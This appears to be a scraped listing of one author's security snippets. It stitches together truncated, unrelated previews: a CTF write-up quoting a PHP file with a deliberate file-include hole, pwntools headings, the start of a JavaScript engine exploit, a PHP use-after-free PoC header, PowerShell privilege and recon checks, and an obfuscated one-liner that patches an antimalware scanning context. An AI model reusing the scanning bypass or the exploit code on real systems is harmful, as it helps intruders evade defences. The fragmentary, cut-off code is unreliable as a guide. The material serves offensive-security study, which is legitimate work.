Ryan Emmons the-emmons

Binary Ninja Python API Cheat Sheet

This is a work in progress by someone who is learning about Binary Ninja.

References

Metadata Details

Get database name

Solving "includer's revenge" from hxp ctf 2021 without controlling any files

The challenge

The challenge was to achieve RCE with this file:

<?php ($_GET['action'] ?? 'read' ) === 'read' ? readfile($_GET['file'] ?? 'index.php') : include_once($_GET['file'] ?? 'index.php');

Some additional hardening was applied to the php installation to make sure that previously known solutions wouldn't work (for further information read this writeup from the challenge author).

I didn't solve the challenge during the competition - here is a writeup from someone who did - but since the idea I had differed from the techniques used in the published writeups I read (and I thought it was cool :D), here is my approach.

Pwntools Cheatsheet

Program Interaction
Environment and Contexts
Logging and Output
Encoding, Packing and Utility
Assembly and Shellcraft
ELFs, Strings and Symbols
Return Oriented Programming
SROP and Sigreturn Frames

	import sys
	import lxml.etree as etree
	from urllib import request
	import dns.resolver

	def main(domain):
	get_expensive_solution(domain)
	get_federation_info(domain)

	def get_expensive_solution(domain):

	/*
	HEAD @ b5fa92428c9d4516ebdc72643ea980d8bde8f987
	*/

	let buf = new ArrayBuffer(8);
	let f64 = new Float64Array(buf);
	let i64 = new BigUint64Array(buf);

	const ftoi = x => {
	f64[0] = x;

	$elevated = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)

	function Show-Menu {
	Clear-Host
	Write-Host "======================================================"
	Write-Host "================ Give Back Control ================"
	Write-Host "======================================================"
	if($elevated -eq $true){
	Write-Host "Local Admin: " -ForegroundColor white -NoNewline; Write-Host $elevated -ForegroundColor Green
	Write-Host "We have superpowers. Ready to continue."

	# Function for getting an MS Graph Token
	Function Get-MSGraphToken {
	<#
	.DESCRIPTION
	Requests a token from STS with the MS Graph specified as the resource/intended audience
	#>
	[cmdletbinding()]
	param(
	[Parameter(Mandatory = $True)]
	[string]

	<?php

	// BUG #81691 https://bugs.php.net/bug.php?id=81691
	// POC: Memory Leak via Use-After-Free


	//export USE_ZEND_ALLOC=0

	# Patch API
	$a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int33[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)

	# Check if current user has permissions
	# to write in C:\Windows\Tasks otherwise
	# use public.
	$Folder = "C:\Windows\Tasks"
	$global:recondir = ""
	$permission = (Get-Acl $Folder).Access \| ?{$_.IdentityReference -match $env:USERNAME} \| Select IdentityReference,FileSystemRights
	If ($permission){